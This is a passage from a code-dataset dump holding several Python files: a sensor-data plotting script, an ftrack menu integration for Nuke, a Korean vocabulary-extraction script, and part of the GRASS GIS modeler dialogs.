Latitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Latitude')\r\nplt.title('Original Latitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original longitude\r\nplt.subplot(2, 4, 4)\r\nplt.plot(original_long, label='Original Longitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Longitude')\r\nplt.title('Original Longitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered acceleration\r\nplt.subplot(2, 4, 5)\r\nplt.plot(filtered_acc[:, 0], label='Filtered Acc_X')\r\nplt.plot(filtered_acc[:, 1], label='Filtered Acc_Y')\r\nplt.plot(filtered_acc[:, 2], label='Filtered Acc_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Acceleration')\r\nplt.title('Filtered Acceleration')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered gyroscope\r\nplt.subplot(2, 4, 6)\r\nplt.plot(filtered_gyro[:, 0], label='Filtered Gyro_X')\r\nplt.plot(filtered_gyro[:, 1], label='Filtered Gyro_Y')\r\nplt.plot(filtered_gyro[:, 2], label='Filtered Gyro_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Angular Velocity')\r\nplt.title('Filtered Gyro')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered latitude\r\nplt.subplot(2, 4, 7)\r\nplt.plot(filtered_lat, label='Filtered Latitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Latitude')\r\nplt.title('Filtered Latitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered longitude\r\nplt.subplot(2, 4, 8)\r\nplt.plot(filtered_long, label='Filtered Longitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Longitude')\r\nplt.title('Filtered Longitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n","repo_name":"SHAIKVAZEERAHAMED/KF-EKF","sub_path":"vaz22.py","file_name":"vaz22.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18760247086","text":"import FnAssetAPI\nfrom ftrack_connect_foundry.ui import delegate\n\nimport ftrack_connect.ui.theme\n\n\nclass Delegate(delegate.Delegate):\n def __init__(self, bridge):\n super(Delegate, self).__init__(bridge)\n\n self.moduleName = \".\".join(__name__.split(\".\")[:-1])\n\n def populate_ftrack(self):\n\n import nuke\n import legacy\n from nukescripts import panels\n\n from ftrack_connect_nuke.ui.widget.crew import NukeCrew\n from ftrack_connect_nuke.connector import Connector\n\n # Check if QtWebKit or QWebEngine is avaliable.\n from FnAssetAPI.ui.toolkit import is_webwidget_supported\n has_webwidgets = is_webwidget_supported()\n\n Connector.registerAssets()\n\n # wrappers for initializing the widgets with\n # the correct connector object\n def wrapImportAssetDialog(*args, **kwargs):\n from ftrack_connect.ui.widget.import_asset import FtrackImportAssetDialog\n return FtrackImportAssetDialog(connector=Connector())\n\n def wrapAssetManagerDialog(*args, **kwargs):\n from ftrack_connect.ui.widget.asset_manager import FtrackAssetManagerDialog\n return FtrackAssetManagerDialog(connector=Connector())\n\n # Populate the ui\n nukeMenu = nuke.menu(\"Nuke\")\n ftrackMenu = nukeMenu.addMenu(\"&ftrack\")\n\n ftrackMenu.addSeparator()\n\n # add ftrack publish node to the menu\n ftrackMenu.addCommand('Create Publish Node', lambda: legacy.createFtrackPublish())\n\n ftrackMenu.addSeparator()\n\n globals()['ftrackImportAssetClass'] = wrapImportAssetDialog\n\n panels.registerWidgetAsPanel(\n '{0}.{1}'.format(__name__, 'ftrackImportAssetClass'),\n 'ftrackImportAsset',\n 'ftrackDialogs.ftrackImportAssetDialog'\n )\n\n ftrackMenu.addSeparator()\n\n ftrackMenu.addCommand(\n 'Import Asset',\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"ftrackDialogs.ftrackImportAssetDialog\");'\n 'panel.addToPane(pane)'\n )\n\n globals()['ftrackAssetManagerDialogClass'] = wrapAssetManagerDialog\n\n # Create the asset manager dialog entry in the menu\n panels.registerWidgetAsPanel(\n '{0}.{1}'.format(__name__, 'ftrackAssetManagerDialogClass'),\n 'ftrackAssetManager',\n 'ftrackDialogs.ftrackAssetManagerDialog'\n )\n ftrackMenu.addCommand(\n 'Asset Manager',\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"ftrackDialogs.ftrackAssetManagerDialog\");'\n 'panel.addToPane(pane)'\n )\n\n if has_webwidgets:\n from ftrack_connect_foundry.ui.info_view import InfoView as _InfoView\n\n ftrackMenu.addCommand(\n _InfoView.getDisplayName(),\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"{identifier}\");'\n 'panel.addToPane(pane)'.format(\n identifier=_InfoView.getIdentifier()\n )\n )\n\n ftrackMenu.addSeparator()\n\n if has_webwidgets:\n from ftrack_connect_foundry.ui.info_view import WorkingTaskInfoView as _WorkingTaskInfoView\n from ftrack_connect_foundry.ui.tasks_view import TasksView as _TasksView\n\n # Add Web Views located in the ftrack_connect_foundry package to the\n # menu for easier access.\n for widget in [\n _TasksView,\n _WorkingTaskInfoView\n ]:\n ftrackMenu.addCommand(\n widget.getDisplayName(),\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"{identifier}\");'\n 'panel.addToPane(pane)'.format(\n identifier=widget.getIdentifier()\n )\n )\n\n ftrackMenu.addSeparator()\n\n # Create the crew dialog entry in the menu\n panels.registerWidgetAsPanel(\n 'ftrack_connect_nuke.ui.widget.crew.NukeCrew',\n 'Crew',\n 'widget.Crew'\n )\n ftrackMenu.addCommand(\n 'Crew',\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"widget.Crew\");'\n 'panel.addToPane(pane)'\n )\n\n # Add new entries in the ftrack menu.\n ftrackMenu.addSeparator()\n\n if has_webwidgets:\n from ftrack_connect_nuke.ui.widget.publish_gizmo import GizmoPublisherDialog\n ftrackMenu.addCommand('Publish gizmo', GizmoPublisherDialog)\n\n # Add ftrack publish node\n toolbar = nuke.toolbar(\"Nodes\")\n ftrackNodesMenu = toolbar.addMenu(\"ftrack\", icon=\"logobox.png\")\n ftrackNodesMenu.addCommand('ftrackPublish', lambda: legacy.createFtrackPublish())\n\n # Set calbacks\n nuke.addOnScriptLoad(legacy.refAssetManager)\n nuke.addOnScriptLoad(legacy.scan_for_new_assets)\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='Write')\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='WriteGeo')\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='Read')\n nuke.addKnobChanged(legacy.ftrackPublishKnobChanged, nodeClass=\"Group\")\n nuke.addOnCreate(legacy.ftrackPublishHieroInit)\n\n def populateUI(self, uiElement, specification, context):\n super(Delegate, self).populateUI(uiElement, specification, context)\n\n host = FnAssetAPI.SessionManager.currentSession().getHost()\n\n if host and host.getIdentifier() == 'uk.co.foundry.nuke':\n self.populate_ftrack()\n\n # Set font on QApplication once UI is created.\n # We do this once since it takes some time to apply the font.\n ftrack_connect.ui.theme.applyFont()\n","repo_name":"IngenuityEngine/ftrack-connect-nuke","sub_path":"source/ftrack_connect_nuke/ui/delegate.py","file_name":"delegate.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23181848574","text":"from vocab_tools import vocab_extractor\n\n'''\nmain.py: EXTRACT WORD/N-GRAM WORDS FROM INPUT TEXTS\n\nit includes functions below.\n\nFunction 0. IMPORT files\n- Import all files inside a folder.\n(This function takes into account the subfolder structures.)\n\nFunction 1. EXTRACT texts\n- Extract texts inside the files.\n(files must be *.pdf or *.hwp)\n\nFunction 2. EXTRACT words from texts\n- If the word you are extracting is a word with one morpheme, use the part-of-speech tag filter; \nif the word is a word with more than one morpheme, extract all n-gram words that appear more than once.\n- Don't do frequency-based filtering in this session because you'll need to consider the result of multiple files combined together;\ndo it later when you combine the files.\n\nFunction 3. SAVE results\n- Save to pickles\n'''\n\n## DEFINE VARIABLES\n# Part-of-speech templates to base lexical extractions on\n# [('EC',)\ntemplates = [\n # 한 단어로 구성된\n ('NNG',),\n ('NNP',),\n ('VV',),\n ('VA',),\n ('VV-I',),\n ('VA-I',),\n ('VV-R',),\n ('VA-R',),\n ('MAG',),\n ('XR',),\n ('SL',),\n\n # 두 단어로 구성된\n ('NNG', 'NNG',),\n # ('NNG', 'SO',),\n ('NNG', 'XSA',),\n ('NNG', 'XSA-I',),\n ('NNG', 'XSA-R',),\n ('NNG', 'XSN',),\n ('NNG', 'XSV',),\n ('NP', 'NNG',),\n ('SN', 'NNG',),\n ('SN', 'SL',),\n ('SL', 'NNG',), #DNA폴리머라아제, QR코드\n ('XR', 'XSN',), #어근+접미사\n ('XR', 'XSV',),\n ('XR', 'XSA',),\n ('XR', 'XSA-I',),\n ('XR', 'XSA-R',),\n ('XR', 'XSM',),\n ('XPN', 'NNG',),#접두사+명,동,형\n ('XPN', 'VV',),\n ('XPN', 'VA',),\n ('XPN', 'VV-I',),\n ('XPN', 'VA-I',),\n ('XPN', 'VV-R',),\n ('XPN', 'VA-R',),\n\n\n\n # 세 단어로 구성된\n ('SN', '', 'NNG',), #3D프린터, 2가염색체\n ('SL', '', 'NNG',), #DNA중합효소\n ('SN', '', '', 'NNG',), #3D레이져프린터\n ('NNG', 'JC', 'NNG',),\n ('NNG', 'JC', 'NNP',),\n ('NNG', 'JKG', 'NNG',),\n ('NNG', 'JKO', 'NNG',),\n ('NNG', 'JKO', 'VV-I',),\n ('NNG', 'JKO', 'VV-R',),\n ('NNG', 'JKO', 'VV',),\n ('NNG', 'NNG', 'NNG',),\n ('NNG', 'NNG', 'XSN',),\n\n # 네 단어로 구성된\n ('NNG', 'NNG', 'NNG', 'NNG',),\n ('SN', 'NNG', 'NNG', 'NNG',), #('3SN', '차원NNG', '공간NNG', '좌표NNG'),\n ('SN', 'SL', 'NNG', 'NNG',), #('3SN', 'DSL', '레이저NNG', '스캐너NNG'),\n ('SN', 'NNB', 'NNG', 'NNG',) #('2SN', '차NNB', '세계NNG', '대전NNG'),\n]\n # ('/NNG',), ('/NNP',), ('/VV',), ('/VA',), ('/MAG',), ('/XR',), ('/SL',), # mono-gram\n # ('',) * 2,\n # ('',) * 3,\n # ('',) * 4\n\ntdir = {\n 'ksat': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/수능 비문학 텍스트 자료/수능txt',\n 'ebs': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/ebs 텍스트 자료',\n 'textbook': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/교과서 텍스트 자료'\n}\npickle_save_dir_ground0 = \"/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/5. pickles/\"\nngram_range = (1, 4) # (a,b); from a to b (not b-1)\n\n\n## EXTRACT VOCABULARY (for each folders & files) & SAVE TO PICKLES\nvocab_extractor(source_text_dir=tdir, pos_templates=templates, pickle_save_dir=pickle_save_dir_ground0, min_count_num=1, ngram_range=(1,4))\n\n\n# test용 저장\n# with open('/Users/kintch/Dropbox/sj/2022-2/4. 수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10:3마감/텍스트 자료/test.txt',\n# 'w', encoding='utf-8') as f:\n# for ngram, freq in counted_ngram_5.items():\n# f.writelines(str(ngram) + ':' + str(freq) + '\\n')\n\n# 어휘 추출\n\n# outparallel_2_spaced = [spacing(x) for x in outparallel_2]\n\n# from tqdm import tqdm\n# outparallel_2_spaced = list()\n# for x in tqdm(outparallel_2):\n# outparallel_2_spaced.append(spacing(x))\n\n\n# test ----------------------------------------------------\n# test= '분열 감염성 질병 갑상샘 개체 개체 수 개체군 개체군의 밀도 개체군의 생장 겉질 결실 고사량 고양이 울음 증후군 고유종 고지혈증 골격근 공생 과분극 관목 교감 신경 구균 구심성 뉴런 군집 군체 귀납적 탐구 방법'\n# test1 = '2 가 염색체 2 차 면역 반응 2 차 소비자 2 차 천이 II형 생존 곡선 이화 작용 인슐린 인플루엔자 바이러스 1 차 면역 반응 1 차 소비자 1 차 천이 I형 생존 곡선'\n# test2 = '생물다양성이감소하는원인은외래종의도입,서식지파괴와 단편화,불법포획과남획,환경오염및��후변화등이있다.'\n# test3 = '버들붕어 개체군 내에서는 텃세가 나타난다. 자신의 세 력권을 형성하여 자신의 영역을 유지하며 다른 개체 와의 경 쟁을 줄여 개체군을 유지한다.'\n\n\n# a = '형질 내세망'\n# b = '인슐린 의존성 당뇨'\n# c = 'ⓐ와 ⓑ는 ATP와 ADP +Pi 중 하나이다.'\n\n\n# from mecab import MeCab\n# mecab = MeCab()\n#\n# mecab.pos('생물다양성은철도,도로등의건설로인한단편화,외래종의 무차별적인도입,무분별한남획등에의해감소한다.')\n# spacing()\n# okt.pos('생물다양성은철도,도로등의건설로인한단편화,외래종의 무차별적인도입,무분별한남획등에의해감소한다.', norm=True)\n","repo_name":"newdboy/KSAT_nonfiction_word","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18886623360","text":"\"\"\"!\n@package gmodeler.dialogs\n\n@brief wxGUI Graphical Modeler - dialogs\n\nClasses:\n - dialogs::ModelDataDialog\n - dialogs::ModelSearchDialog\n - dialogs::ModelRelationDialog\n - dialogs::ModelItemDialog\n - dialogs::ModelLoopDialog\n - dialogs::ModelConditionDialog\n - dialogs::ModelListCtrl\n - dialogs::ValiableListCtrl\n - dialogs::ItemListCtrl\n - dialogs::ItemCheckListCtrl\n\n(C) 2010-2011 by the GRASS Development Team\n\nThis program is free software under the GNU General Public License\n(>=v2). Read the file COPYING that comes with GRASS for details.\n\n@author Martin Landa \n\"\"\"\n\nimport os\nimport sys\n\nimport wx\nimport wx.lib.mixins.listctrl as listmix\n\nfrom core import globalvar\nfrom core import utils\nfrom gui_core.widgets import GNotebook\nfrom core.gcmd import GError, EncodeString\nfrom gui_core.dialogs import ElementDialog, MapLayersDialog\nfrom gui_core.ghelp import SearchModuleWindow\nfrom gui_core.prompt import GPromptSTC\nfrom gui_core.forms import CmdPanel\nfrom gui_core.gselect import Select\nfrom gmodeler.model import *\n\nfrom grass.script import task as gtask\n\nclass ModelDataDialog(ElementDialog):\n \"\"\"!Data item properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Data properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER):\n self.parent = parent\n self.shape = shape\n \n label, etype = self._getLabel()\n ElementDialog.__init__(self, parent, title, label = label, etype = etype)\n \n self.element = Select(parent = self.panel)\n self.element.SetValue(shape.GetValue())\n \n self.Bind(wx.EVT_BUTTON, self.OnOK, self.btnOK)\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.btnCancel)\n \n self.PostInit()\n \n if shape.GetValue():\n self.btnOK.Enable()\n \n self._layout()\n self.SetMinSize(self.GetSize())\n \n def _getLabel(self):\n etype = False\n prompt = self.shape.GetPrompt()\n if prompt == 'raster':\n label = _('Name of raster map:')\n elif prompt == 'vector':\n label = _('Name of vector map:')\n else:\n etype = True\n label = _('Name of element:')\n\n return label, etype\n \n def _layout(self):\n \"\"\"!Do layout\"\"\"\n self.dataSizer.Add(self.element, proportion=0,\n flag=wx.EXPAND | wx.ALL, border=1)\n \n self.panel.SetSizer(self.sizer)\n self.sizer.Fit(self)\n\n def OnOK(self, event):\n \"\"\"!Ok pressed\"\"\"\n self.shape.SetValue(self.GetElement())\n if self.etype:\n elem = self.GetType()\n if elem == 'rast':\n self.shape.SetPrompt('raster')\n elif elem == 'vect':\n self.shape.SetPrompt('raster')\n \n self.parent.canvas.Refresh()\n self.parent.SetStatusText('', 0)\n self.shape.SetPropDialog(None)\n \n if self.IsModal():\n event.Skip() \n else:\n self.Destroy()\n \n def OnCancel(self, event):\n \"\"\"!Cancel pressed\"\"\"\n self.shape.SetPropDialog(None)\n if self.IsModal():\n event.Skip()\n else:\n self.Destroy()\n\nclass ModelSearchDialog(wx.Dialog):\n def __init__(self, parent, id = wx.ID_ANY, title = _(\"Add new GRASS module to the model\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n \"\"\"!Graphical modeler module search window\n \n @param parent parent window\n @param id window id\n @param title window title\n @param kwargs wx.Dialogs' arguments\n \"\"\"\n self.parent = parent\n \n wx.Dialog.__init__(self, parent = parent, id = id, title = title, **kwargs)\n self.SetName(\"ModelerDialog\")\n self.SetIcon(wx.Icon(os.path.join(globalvar.ETCICONDIR, 'grass.ico'), wx.BITMAP_TYPE_ICO))\n \n self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n \n self.cmdBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"Command\"))\n \n self.cmd_prompt = GPromptSTC(parent = self)\n self.search = SearchModuleWindow(parent = self.panel, cmdPrompt = self.cmd_prompt, showTip = True)\n wx.CallAfter(self.cmd_prompt.SetFocus)\n \n # get commands\n items = self.cmd_prompt.GetCommandItems()\n \n self.btnCancel = wx.Button(self.panel, wx.ID_CANCEL)\n self.btnOk = wx.Button(self.panel, wx.ID_OK)\n self.btnOk.SetDefault()\n self.btnOk.Enable(False)\n\n self.cmd_prompt.Bind(wx.EVT_KEY_UP, self.OnText)\n self.search.searchChoice.Bind(wx.EVT_CHOICE, self.OnText)\n self.Bind(wx.EVT_BUTTON, self.OnOk, self.btnOk)\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.btnCancel)\n \n self._layout()\n \n self.SetSize((500, 275))\n \n def _layout(self):\n cmdSizer = wx.StaticBoxSizer(self.cmdBox, wx.VERTICAL)\n cmdSizer.Add(item = self.cmd_prompt, proportion = 1,\n flag = wx.EXPAND)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n \n mainSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(item = self.search, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n mainSizer.Add(item = cmdSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border = 3)\n mainSizer.Add(item = btnSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border = 5)\n \n self.panel.SetSizer(mainSizer)\n mainSizer.Fit(self.panel)\n \n self.Layout()\n\n def GetPanel(self):\n \"\"\"!Get dialog panel\"\"\"\n return self.panel\n\n def GetCmd(self):\n \"\"\"!Get command\"\"\"\n line = self.cmd_prompt.GetCurLine()[0].strip()\n if len(line) == 0:\n list()\n \n try:\n cmd = utils.split(str(line))\n except UnicodeError:\n cmd = utils.split(utils.EncodeString((line)))\n \n return cmd\n \n def OnOk(self, event):\n \"\"\"!Button 'OK' pressed\"\"\"\n # hide autocomplete\n if self.cmd_prompt.AutoCompActive():\n self.cmd_prompt.AutoCompCancel()\n \n self.btnOk.SetFocus()\n cmd = self.GetCmd()\n \n if len(cmd) < 1:\n GError(parent = self,\n message = _(\"Command not defined.\\n\\n\"\n \"Unable to add new action to the model.\"))\n return\n \n if cmd[0] not in globalvar.grassCmd:\n GError(parent = self,\n message = _(\"'%s' is not a GRASS module.\\n\\n\"\n \"Unable to add new action to the model.\") % cmd[0])\n return\n \n self.EndModal(wx.ID_OK)\n \n def OnCancel(self, event):\n \"\"\"Cancel pressed, close window\"\"\"\n # hide autocomplete\n if self.cmd_prompt.AutoCompActive():\n self.cmd_prompt.AutoCompCancel()\n \n self.Hide()\n \n def OnText(self, event):\n \"\"\"!Text in prompt changed\"\"\"\n if self.cmd_prompt.AutoCompActive():\n event.Skip()\n return\n \n if isinstance(event, wx.KeyEvent):\n entry = self.cmd_prompt.GetTextLeft()\n elif isinstance(event, wx.stc.StyledTextEvent):\n entry = event.GetText()\n else:\n entry = event.GetString()\n \n if entry:\n self.btnOk.Enable()\n else:\n self.btnOk.Enable(False)\n \n event.Skip()\n \n def Reset(self):\n \"\"\"!Reset dialog\"\"\"\n self.search.Reset()\n self.cmd_prompt.OnCmdErase(None)\n self.btnOk.Enable(False)\n self.cmd_prompt.SetFocus()\n\nclass ModelRelationDialog(wx.Dialog):\n \"\"\"!Relation properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Relation properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n self.parent = parent\n self.shape = shape\n \n options = self._getOptions()\n if not options:\n self.valid = False\n return\n \n self.valid = True\n wx.Dialog.__init__(self, parent, id, title, style = style, **kwargs)\n self.SetIcon(wx.Icon(os.path.join(globalvar.ETCICONDIR, 'grass.ico'), wx.BITMAP_TYPE_ICO))\n \n self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n \n self.fromBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label = \" %s \" % _(\"From\"))\n self.toBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label = \" %s \" % _(\"To\"))\n \n self.option = wx.ComboBox(parent = self.panel, id = wx.ID_ANY,\n style = wx.CB_READONLY,\n choices = options)\n self.option.Bind(wx.EVT_COMBOBOX, self.OnOption)\n \n self.btnCancel = wx.Button(self.panel, wx.ID_CANCEL)\n self.btnOk = wx.Button(self.panel, wx.ID_OK)\n self.btnOk.Enable(False)\n \n self._layout()\n\n def _layout(self):\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n fromSizer = wx.StaticBoxSizer(self.fromBox, wx.VERTICAL)\n self._layoutShape(shape = self.shape.GetFrom(), sizer = fromSizer)\n toSizer = wx.StaticBoxSizer(self.toBox, wx.VERTICAL)\n self._layoutShape(shape = self.shape.GetTo(), sizer = toSizer)\n\n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n \n mainSizer.Add(item = fromSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 5)\n mainSizer.Add(item = toSizer, proportion = 0,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border = 5)\n mainSizer.Add(item = btnSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border = 5)\n \n self.panel.SetSizer(mainSizer)\n mainSizer.Fit(self.panel)\n \n self.Layout()\n self.SetSize(self.GetBestSize())\n \n def _layoutShape(self, shape, sizer):\n if isinstance(shape, ModelData):\n sizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Data: %s\") % shape.GetLog()),\n proportion = 1, flag = wx.EXPAND | wx.ALL,\n border = 5)\n elif isinstance(shape, ModelAction):\n gridSizer = wx.GridBagSizer (hgap = 5, vgap = 5)\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Command:\")),\n pos = (0, 0))\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = shape.GetName()),\n pos = (0, 1))\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Option:\")),\n flag = wx.ALIGN_CENTER_VERTICAL,\n pos = (1, 0))\n gridSizer.Add(item = self.option,\n pos = (1, 1))\n sizer.Add(item = gridSizer,\n proportion = 1, flag = wx.EXPAND | wx.ALL,\n border = 5)\n \n def _getOptions(self):\n \"\"\"!Get relevant options\"\"\"\n items = []\n fromShape = self.shape.GetFrom()\n if not isinstance(fromShape, ModelData):\n GError(parent = self.parent,\n message = _(\"Relation doesn't start with data item.\\n\"\n \"Unable to add relation.\"))\n return items\n \n toShape = self.shape.GetTo()\n if not isinstance(toShape, ModelAction):\n GError(parent = self.parent,\n message = _(\"Relation doesn't point to GRASS command.\\n\"\n \"Unable to add relation.\"))\n return items\n \n prompt = fromShape.GetPrompt()\n task = toShape.GetTask()\n for p in task.get_options()['params']:\n if p.get('prompt', '') == prompt and \\\n 'name' in p:\n items.append(p['name'])\n \n if not items:\n GError(parent = self.parent,\n message = _(\"No relevant option found.\\n\"\n \"Unable to add relation.\"))\n return items\n \n def GetOption(self):\n \"\"\"!Get selected option\"\"\"\n return self.option.GetStringSelection()\n \n def IsValid(self):\n \"\"\"!Check if relation is valid\"\"\"\n return self.valid\n \n def OnOption(self, event):\n \"\"\"!Set option\"\"\"\n if event.GetString():\n self.btnOk.Enable()\n else:\n self.btnOk.Enable(False)\n\nclass ModelItemDialog(wx.Dialog):\n \"\"\"!Abstract item properties dialog\"\"\"\n def __init__(self, parent, shape, title, id = wx.ID_ANY,\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n self.parent = parent\n self.shape = shape\n \n wx.Dialog.__init__(self, parent, id, title = title, style = style, **kwargs)\n \n self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n \n self.condBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"Condition\"))\n self.condText = wx.TextCtrl(parent = self.panel, id = wx.ID_ANY,\n value = shape.GetText())\n \n self.itemList = ItemCheckListCtrl(parent = self.panel,\n window = self,\n columns = [_(\"ID\"), _(\"Name\"),\n _(\"Command\")],\n shape = shape)\n self.itemList.Populate(self.parent.GetModel().GetItems())\n \n self.btnCancel = wx.Button(parent = self.panel, id = wx.ID_CANCEL)\n self.btnOk = wx.Button(parent = self.panel, id = wx.ID_OK)\n self.btnOk.SetDefault()\n \n def _layout(self):\n \"\"\"!Do layout (virtual method)\"\"\"\n pass\n \n def GetCondition(self):\n \"\"\"!Get loop condition\"\"\"\n return self.condText.GetValue()\n\nclass ModelLoopDialog(ModelItemDialog):\n \"\"\"!Loop properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Loop properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n ModelItemDialog.__init__(self, parent, shape, title,\n style = style, **kwargs)\n \n self.listBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"List of items in loop\"))\n \n self.btnSeries = wx.Button(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Series\"))\n self.btnSeries.SetToolTipString(_(\"Define map series as condition for the loop\"))\n self.btnSeries.Bind(wx.EVT_BUTTON, self.OnSeries)\n \n self._layout()\n self.SetMinSize(self.GetSize())\n self.SetSize((500, 400))\n \n def _layout(self):\n \"\"\"!Do layout\"\"\"\n sizer = wx.BoxSizer(wx.VERTICAL)\n \n condSizer = wx.StaticBoxSizer(self.condBox, wx.HORIZONTAL)\n condSizer.Add(item = self.condText, proportion = 1,\n flag = wx.ALL, border = 3)\n condSizer.Add(item = self.btnSeries, proportion = 0,\n flag = wx.EXPAND)\n\n listSizer = wx.StaticBoxSizer(self.listBox, wx.VERTICAL)\n listSizer.Add(item = self.itemList, proportion = 1,\n flag = wx.EXPAND | wx.ALL, border = 3)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n\n sizer.Add(item = condSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n sizer.Add(item = listSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = btnSizer, proportion=0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border=5)\n \n self.panel.SetSizer(sizer)\n sizer.Fit(self.panel)\n \n self.Layout()\n \n def GetItems(self):\n \"\"\"!Get list of selected actions\"\"\"\n return self.itemList.GetItems()\n\n def OnSeries(self, event):\n \"\"\"!Define map series as condition\"\"\"\n dialog = MapLayersDialog(parent = self, title = _(\"Define series of maps\"), modeler = True)\n if dialog.ShowModal() != wx.ID_OK:\n dialog.Destroy()\n return\n \n cond = dialog.GetDSeries()\n if not cond:\n cond = 'map in %s' % map(lambda x: str(x), dialog.GetMapLayers())\n \n self.condText.SetValue(cond)\n \n dialog.Destroy()\n\nclass ModelConditionDialog(ModelItemDialog):\n \"\"\"!Condition properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"If-else properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n ModelItemDialog.__init__(self, parent, shape, title,\n style = style, **kwargs)\n \n self.listBoxIf = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"List of items in 'if' block\"))\n self.itemListIf = self.itemList\n self.itemListIf.SetName('IfBlockList')\n \n self.listBoxElse = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"List of items in 'else' block\"))\n self.itemListElse = ItemCheckListCtrl(parent = self.panel,\n window = self,\n columns = [_(\"ID\"), _(\"Name\"),\n _(\"Command\")],\n shape = shape)\n self.itemListElse.SetName('ElseBlockList')\n 